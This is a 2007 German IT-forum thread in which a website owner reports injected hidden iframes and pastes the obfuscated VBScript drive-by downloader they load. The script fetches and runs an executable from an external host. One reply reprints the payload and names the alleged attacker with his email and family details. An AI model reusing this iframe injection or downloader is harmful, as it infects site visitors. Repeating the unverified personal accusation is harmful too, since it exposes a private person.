Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Homepage gehackt wurden?

Frage Sicherheit Erkennung und -Abwehr

Mitglied: Casanitto

Casanitto (Level 1) - Jetzt verbinden

08.09.2007, aktualisiert 09.09.2007, 4201 Aufrufe, 2 Kommentare

Hallo,

Seit heute kann ich mich nicht mehr in meine Homepage einloggen, benutze Webspell als CMS.
Er sagt mir zwar das ich korrekt eingeloggt bin, abba dann bei der nächsten Seite sagt er das ich eingeloggt sein muss um die Webseite zusehen!
Habe dann mal geschaut im Quelltext und da steht dann das hier:

01.
 <IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
02.
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
03.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
Das ist aber nicht von mir!
Wenn man diese Webseite aufruft kommt folgendes :
01.
<script language="JavaScript"> 
02.
<!-- 
03.
 
04.
function SymError() 
05.
06.
  return true; 
07.
08.
 
09.
window.onerror = SymError; 
10.
 
11.
var SymRealWinOpen = window.open; 
12.
 
13.
function SymWinOpen(url, name, attributes) 
14.
15.
  return (new Object()); 
16.
17.
 
18.
window.open = SymWinOpen; 
19.
 
20.
//--> 
21.
</script> 
22.
 
23.
<script language="JavaScript"> 
24.
<!-- 
25.
 
26.
function SymError() 
27.
28.
  return true; 
29.
30.
 
31.
window.onerror = SymError; 
32.
 
33.
var SymRealWinOpen = window.open; 
34.
 
35.
function SymWinOpen(url, name, attributes) 
36.
37.
  return (new Object()); 
38.
39.
 
40.
window.open = SymWinOpen; 
41.
 
42.
//--> 
43.
</script> 
44.
 
45.
<SCRIPT LANGUAGE="VBS"><!-- 
46.
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu" 
47.
s="" 
48.
For i=1 To Len(d) 
49.
b=Mid(d,i,1) 
50.
a=Asc(b) 
51.
If a=1 Then a=9 
52.
If a=2 Then a=10 
53.
If a=3 Then a=13 
54.
If a=4 Then a=34 
55.
If a<=31 And a>=14 Then 
56.
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4) 
57.
i=i+2 
58.
Else 
59.
if a>=41 and a<=127 then a=a-1 
60.
if a <127 then s=s+Chr(a) else s=s+b 
61.
End If 
62.
Next 
63.
document.write s 
64.
 
65.
--></SCRIPT> 
66.
<script language="JavaScript"> 
67.
<!-- 
68.
var SymRealOnLoad; 
69.
var SymRealOnUnload; 
70.
 
71.
function SymOnUnload() 
72.
73.
  window.open = SymWinOpen; 
74.
  if(SymRealOnUnload != null) 
75.
     SymRealOnUnload(); 
76.
77.
 
78.
function SymOnLoad() 
79.
80.
  if(SymRealOnLoad != null) 
81.
     SymRealOnLoad(); 
82.
  window.open = SymRealWinOpen; 
83.
  SymRealOnUnload = window.onunload; 
84.
  window.onunload = SymOnUnload; 
85.
86.
 
87.
SymRealOnLoad = window.onload; 
88.
window.onload = SymOnLoad; 
89.
 
90.
//--> 
91.
</script> 
92.
 
93.
 
94.
<script language="JavaScript"> 
95.
<!-- 
96.
var SymRealOnLoad; 
97.
var SymRealOnUnload; 
98.
 
99.
function SymOnUnload() 
100.
101.
  window.open = SymWinOpen; 
102.
  if(SymRealOnUnload != null) 
103.
     SymRealOnUnload(); 
104.
105.
 
106.
function SymOnLoad() 
107.
108.
  if(SymRealOnLoad != null) 
109.
     SymRealOnLoad(); 
110.
  window.open = SymRealWinOpen; 
111.
  SymRealOnUnload = window.onunload; 
112.
  window.onunload = SymOnUnload; 
113.
114.
 
115.
SymRealOnLoad = window.onload; 
116.
window.onload = SymOnLoad; 
117.
 
118.
//--> 
119.
</script>
Kann mir von euch vielleicht jemand sagen was das sein soll?

Gruss Casanitto
Mitglied: thekingofqueens
08.09.2007 um 22:27 Uhr
Provider informieren, Backup des Contents machen, alles löschen und von vorne anfangen.
Bitte warten ..
Mitglied: gnarff
09.09.2007 um 02:09 Uhr
Zu den Codesnippet:
1: Ein Scriptblocker
2. Geblockt wurde folgendes Script:
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

Wenn Du wissen willst was Alvarez auf Deiner HP wollte oder dich gar beschweren moechtest, so kannst Du das direkt bei Ihm tun alvarezluque@arnet.com.ar, sein Vater ist Sekretaer des Rotary Clubs in Corrientes, Argentinien, sein voller Name ist Augusto Alvarez Luque, Dipl. Informatiker,
saludos
gnarff
Bitte warten ..
Ähnliche Inhalte
Windows Server
Server 2003 wurde gehackt was tun ?
Frage von sockel7Windows Server10 Kommentare

Hallo , Ich habe in meinem Unternehmen noch einen Windows Server 2003 in Betrieb !. Dieser wurde nun am ...

Rechtliche Fragen
Microsoftkonto wurde gehackt - Liegt das Problem direkt bei Microsoft?
gelöst Frage von Stefan007Rechtliche Fragen7 Kommentare

Guten Abend, ich hatte ein wirklich "spaßiges" Wochenende. Als ich am Freitag auf dem Weg in den Kurzurlaub war, ...

Linux Netzwerk
Exim4 gehackt ?
gelöst Frage von linuxmatrixLinux Netzwerk8 Kommentare

Guten Morgen, hab hier meinen Homewebserver der mir über Debian Wheezy/nginx/php5/Exim4 Statusmails aufs Handy sendet. Problem: Irgendein Depp hats ...

Sicherheit
DSL Zugangsdaten gehackt?
Frage von Mr.HeisenbergSicherheit34 Kommentare

Hallo, nach Erhalt einer sehr hohen Telefonrechnung, bin ich stutzig geworden und habe mir einen Einzelverbindungsnachweis angefordert. Dort ist ...

Neue Wissensbeiträge
Windows 10

Autsch: Microsoft bündelt Windows 10 mit unsicherer Passwort-Manager-App

Tipp von kgborn vor 2 TagenWindows 106 Kommentare

Unter Microsofts Windows 10 haben Endbenutzer keine Kontrolle mehr, was Microsoft an Apps auf dem Betriebssystem installiert (die Windows ...

Sicherheits-Tools

Achtung: Sicherheitslücke im FortiClient VPN-Client

Tipp von kgborn vor 2 TagenSicherheits-Tools

Ich weiß nicht, wie häufig die NextGeneration Endpoint Protection-Lösung von Fortinet in deutschen Unternehmen eingesetzt wird. An dieser Stelle ...

Internet

USA: Die FCC schaff die Netzneutralität ab

Information von Frank vor 2 TagenInternet5 Kommentare

Jetzt beschädigt US-Präsident Donald Trump auch noch das Internet. Der neu eingesetzte FCC-Chef Ajit Pai ist bekannter Gegner einer ...

DSL, VDSL

ALL-BM200VDSL2V - Neues VDSL-Modem mit Vectoring von Allnet

Information von Lochkartenstanzer vor 2 TagenDSL, VDSL2 Kommentare

Moin, Falls jemand eine Alternative zu dem draytek sucht: Gruß lks

Heiß diskutierte Inhalte
Batch & Shell
Kann man mit einer .txt Datei eine .bat Datei öffnen?
gelöst Frage von HelloWorldBatch & Shell20 Kommentare

Wie schon im Titel beschrieben würde ich gerne durch einfaches klicken auf eine Text oder Word Datei eine Batch ...

Router & Routing
OpenWRT bzw. L.E.D.E auf Buffalo WZR-HP-AG300H - update
gelöst Frage von EpigeneseRouter & Routing11 Kommentare

Guten Tag, ich habe auf einem Buffalo WZR-HP-AG300H die alternative Firmware vom L.E.D.E Projekt geflasht. Ich bin es von ...

LAN, WAN, Wireless
WLAN Reichweite erhöhen mit neuer Antenne
gelöst Frage von gdconsultLAN, WAN, Wireless9 Kommentare

Hallo, ich besitze einen TL-WN722N USB-WLAN Dongle mit einer richtigen Antenne. Ich frage mich jetzt ob man die Reichweite ...

Windows Server
Ping auf einen bestimmten Server nicht möglich
gelöst Frage von a.thierWindows Server7 Kommentare

Hallo, ich habe folgendes Problem. srv-dc1: Ping srv-nav > geht Ping srv-exchange > geht nicht srv-exchange: Ping srv-dc1 > ...